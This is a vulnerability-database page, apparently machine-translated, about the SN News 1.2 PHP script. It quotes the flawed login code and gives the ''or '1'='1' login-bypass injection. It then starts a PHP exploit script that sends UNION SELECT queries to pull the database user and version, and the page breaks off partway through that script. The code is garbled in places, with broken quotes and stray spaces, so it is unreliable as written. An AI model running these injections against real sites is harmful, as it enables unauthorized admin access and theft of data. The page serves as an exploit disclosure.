logo
DATABASE RESOURCES PRICING ABOUT US

SN News <= 1.2 management rights authentication bypass and injection-vulnerability warning-the black bar safety net

Description

SN News <= 1.2 (/admin/loger.php) Admin Bypass Remote SQL Injection Vulnerability Impact of version 1.2 Download address: http://phpbrasil.com/script/JHnpFRmSBqlf/sn-news The author is not any harm to the responsible ############################################################################## ## The defect is located- /admin/logar.php [4-15]: 4.$ login = $_POST["login"]; 5.$ senha = $_POST["senha"]; 6.$ sql = "select * from news_adm where login='$login' AND senha='$senha'"; 7.$ query = mysql_query($sql); 8.$ nr = mysql_num_rows($query); 9. if($nr>0){ 1 0.$ _SESSION["admin"] = "on"; 1 1. echo "<script> 1 2. location. href='../' 1 3.& lt;/script> 1 4."; 1 5.} ## Comment: ## As you can see there is no validation or any filter to variables $login and $senha. ## See line 6, so you can inject sql query by using $login and $senha variables. ## SQL Injection PoC: ## http://www.xxx.com /sn_news/admin/login.htm ## Login: 'or '1'='1 ## Senha: 'or '1'='1 ## This injection will bypass the admin login screen. # Title: SN News < = 1.2 SQL Injection <? php /* Example: $ php mnews.php http://www.xxx.com /scripts/mnews/ */ error_reporting(E_ERROR); set_time_limit(0); @ini_set("default_socket_timeout", 3 0); function hex($string){ $hex="; // PHP 'Dim' =] for ($i=0; $i < strlen($string); $i++){ $hex .= dechex(ord($string[$i])); } return '0x'.$ hex; } echo "\nSN News <= 1.2 SQL Injection exploit\n"; echo "Discovered and written by WhiteCollarGroup\n"; echo "www.wcgroup.host56.com - whitecollar_group@hotmail.com\n\n"; if($argc!= 2) { echo "Usage: \n"; echo "php $argv[0] <target url>\n"; echo "Example:\n"; echo "php $argv[0] http://www.website.com/snnews\n"; exit; } $target = $argv[1]; if(substr($target, (strlen($target)-1))!="/") { $target .= "/"; } $inject = $target . "visualiza. php? id=-0'%2 0"; $token = uniqid(); $token_hex = hex($token); echo "[*] Trying to get informations...\n"; $infos = file_get_contents($inject. urlencode("union all select 1,concat(".$ token_hex.", user(), ".$ token_hex.", version(), ".$ token_hex."), 3,4,5-- ")); $infos_r = array(); preg_match_all("/$token(.*)$ token(.*)$ token/", $infos, $infos_r); $user = $infos_r[1][0]; $version = $infos_r[2][0]; **[1] [[2]](<34103_2.htm>) [next](<34103_2.htm>)**